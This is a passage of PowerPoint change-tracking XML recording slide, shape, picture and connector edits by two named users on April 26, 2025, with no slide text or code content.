        <pc:spChg chg="add">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:14:53.370" v="34"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149463705" sldId="262"/>
            <ac:spMk id="19" creationId="{F10FD715-4DCE-4779-B634-EC78315EA213}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:14:53.370" v="34"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149463705" sldId="262"/>
            <ac:spMk id="20" creationId="{72E84EBB-D1FF-AD52-D0D0-1A2D3518A9AD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add del">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:14:53.370" v="33"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149463705" sldId="262"/>
            <ac:graphicFrameMk id="10" creationId="{4B42579B-8475-56D3-48F9-E1DF9B3EE9A8}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:cxnChg chg="add del">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:14:53.370" v="34"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149463705" sldId="262"/>
            <ac:cxnSpMk id="8" creationId="{0B5F7E3B-C5F1-40E0-A491-558BAFBC1127}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
        <pc:cxnChg chg="add">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:14:53.370" v="34"/>
          <ac:cxnSpMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4149463705" sldId="262"/>
            <ac:cxnSpMk id="17" creationId="{1A1FE6BB-DFB2-4080-9B5E-076EF5DDE67B}"/>
          </ac:cxnSpMkLst>
        </pc:cxnChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new">
        <pc:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:09:39.315" v="31" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1181177462" sldId="269"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:02:27.605" v="17" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1181177462" sldId="269"/>
            <ac:spMk id="2" creationId="{19BC1A0A-3DC0-F903-AD70-42525DF31441}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del mod">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:05:24.687" v="19"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1181177462" sldId="269"/>
            <ac:spMk id="3" creationId="{34A94186-4AF8-4A96-78F6-C676500DC38C}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod ord">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:05:37.671" v="23" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1181177462" sldId="269"/>
            <ac:picMk id="4" creationId="{97A1A6B6-28BE-AFFF-2B82-7DA37C4636D8}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:06:38.093" v="29" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1181177462" sldId="269"/>
            <ac:picMk id="5" creationId="{D6261573-BB04-E8A2-D435-5F9B1C3296F6}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="Ravula, Vishal Suman" userId="S::vishalsumanravula@my.unt.edu::347f44b5-53cc-4ba1-970d-912d34ea71a7" providerId="AD" clId="Web-{47D37B67-6993-93C7-9690-5555B8F70D72}" dt="2025-04-26T06:09:39.315" v="31" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1181177462" sldId="269"/>
            <ac:picMk id="6" creationId="{8D9B921C-BA48-C890-764F-C26E1F44B00C}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:58:38.050" v="498"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="delSp modSp mod modTransition delDesignElem">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:23:59.997" v="139" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="911079474" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:23:16.270" v="135" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="911079474" sldId="256"/>
            <ac:spMk id="2" creationId="{B0A25243-00C8-060F-D1B3-542370B52B9D}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:23:59.997" v="139" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="911079474" sldId="256"/>
            <ac:spMk id="3" creationId="{B2A0304C-3A2C-438D-F82A-0352A3539525}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:20.355" v="69"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="911079474" sldId="256"/>
            <ac:spMk id="9" creationId="{6E448DB1-4196-18A6-15DA-C72635C1B11E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:20.355" v="69"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="911079474" sldId="256"/>
            <ac:spMk id="11" creationId="{A9CCD9CD-49AE-3D3E-923B-81ECD3FBF75F}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modTransition setBg">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:35:10.910" v="460" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1512375413" sldId="257"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:35:10.910" v="460" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="2" creationId="{68679AC0-8690-B4B4-1128-D2E0211A06DD}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:34:54.842" v="459" actId="313"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="3" creationId="{6492E8DD-67A4-12FD-F8E4-050F8FB246B3}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.342" v="77" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="13" creationId="{3F088236-D655-4F88-B238-E16762358025}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.342" v="77" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="15" creationId="{3DAC0C92-199E-475C-9390-119A9B027276}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.342" v="77" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="17" creationId="{C4CFB339-0ED8-4FE2-9EF1-6D1375B8499B}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.342" v="77" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="19" creationId="{31896C80-2069-4431-9C19-83B913734490}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.342" v="77" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="21" creationId="{BF120A21-0841-4823-B0C4-28AEBCEF9B78}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.342" v="77" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="23" creationId="{DBB05BAE-BBD3-4289-899F-A6851503C6B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.342" v="77" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="25" creationId="{9874D11C-36F5-4BBE-A490-019A54E953B0}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.353" v="78" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:spMk id="28" creationId="{518E5A25-92C5-4F27-8E26-0AAAB0CDC85E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.342" v="77" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:picMk id="5" creationId="{D2E11997-E5A2-C71C-3556-C82D539F5D49}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:15:37.353" v="78" actId="26606"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="1512375413" sldId="257"/>
            <ac:picMk id="27" creationId="{13DDD318-313C-E564-1DB4-1B981041E0F9}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modTransition">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:36:01.992" v="470" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2862277646" sldId="258"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:25:57.330" v="159" actId="207"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2862277646" sldId="258"/>
            <ac:spMk id="2" creationId="{084032C2-FF74-2DB0-0F2C-8BA3AC195A79}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:16:12.031" v="81" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2862277646" sldId="258"/>
            <ac:spMk id="3" creationId="{67E5C271-54F8-A66A-5E8F-106119E03DEE}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:16:11.996" v="80" actId="26606"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2862277646" sldId="258"/>
            <ac:graphicFrameMk id="5" creationId="{73EC72D9-049A-52B4-F5B9-0286AA15D514}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:36:01.992" v="470" actId="20577"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2862277646" sldId="258"/>
            <ac:graphicFrameMk id="7" creationId="{1E123D76-7B09-85E3-6462-5AD6DEF10A61}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp modSp new mod modTransition setBg">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:53:59.471" v="497"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3123057094" sldId="259"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:39:01.727" v="482" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3123057094" sldId="259"/>
            <ac:spMk id="2" creationId="{06C66397-2516-4039-8E40-5850BCC57B74}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add del mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:16:33.658" v="84" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3123057094" sldId="259"/>
            <ac:spMk id="3" creationId="{30586672-BFF4-21C9-9359-91568788E937}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:20:11.714" v="111" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3123057094" sldId="259"/>
            <ac:spMk id="12" creationId="{9F4444CE-BC8D-4D61-B303-4C05614E62AB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:20:11.714" v="111" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3123057094" sldId="259"/>
            <ac:spMk id="14" creationId="{73772B81-181F-48B7-8826-4D9686D15DF5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:20:11.714" v="111" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3123057094" sldId="259"/>
            <ac:spMk id="16" creationId="{B2205F6E-03C6-4E92-877C-E2482F6599AA}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:graphicFrameChg chg="add del">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:16:33.627" v="83" actId="26606"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3123057094" sldId="259"/>
            <ac:graphicFrameMk id="5" creationId="{EAB8D9EA-02D7-F4BE-69A9-F48EAC1AC115}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
        <pc:graphicFrameChg chg="add mod modGraphic">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:53:59.471" v="497"/>
          <ac:graphicFrameMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3123057094" sldId="259"/>
            <ac:graphicFrameMk id="7" creationId="{0248F742-AEFB-F8B8-305C-4CDCA551A2E6}"/>
          </ac:graphicFrameMkLst>
        </pc:graphicFrameChg>
      </pc:sldChg>
      <pc:sldChg chg="modSp new mod modTransition">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:51:29.577" v="496" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="3106919966" sldId="260"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:51:00.890" v="492" actId="1076"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3106919966" sldId="260"/>
            <ac:spMk id="2" creationId="{AB37D4D5-149E-7941-4D40-C39F0490AF65}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:51:29.577" v="496" actId="14100"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="3106919966" sldId="260"/>
            <ac:spMk id="3" creationId="{81E391E3-E03B-747B-18F7-5324867CD306}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modTransition setBg setClrOvrMap">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:13.674" v="225" actId="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2725816599" sldId="261"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:13.674" v="225" actId="122"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="2" creationId="{FB410BC7-2A20-A88B-7DB7-C6B6EDF2B86E}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:26:32.893" v="165" actId="255"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="3" creationId="{882642F8-CD04-0CDE-F20C-322396F1358F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:02.454" v="85" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="8" creationId="{A65AC7D1-EAA9-48F5-B509-60A7F50BF703}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:02.454" v="85" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="10" creationId="{D6320AF9-619A-4175-865B-5663E1AEF4C5}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:02.454" v="85" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="16" creationId="{7E018740-5C2B-4A41-AC1A-7E68D1EC1954}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:02.454" v="85" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="18" creationId="{166F75A4-C475-4941-8EE2-B80A06A2C1BB}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:02.454" v="85" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="20" creationId="{A032553A-72E8-4B0D-8405-FF9771C9AF05}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:02.454" v="85" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="22" creationId="{765800AC-C3B9-498E-87BC-29FAE4C76B21}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:02.454" v="85" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="24" creationId="{1F9D6ACB-2FF4-49F9-978A-E0D5327FC635}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:spChg chg="add">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:17:02.454" v="85" actId="26606"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2725816599" sldId="261"/>
            <ac:spMk id="26" creationId="{142BFA2A-77A0-4F60-A32A-685681C84889}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp modSp new mod modTransition setBg">
        <pc:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:21.234" v="226" actId="122"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4149463705" sldId="262"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Elmorsi, Youssef" userId="e9861dc8-8bff-4866-9074-336d6327db70" providerId="ADAL" clId="{F58BD28F-B528-4262-9C95-32EB3128283F}" dt="2025-04-26T04:30:21.234" v="226" actId="122"/>
          <ac:spMkLst>
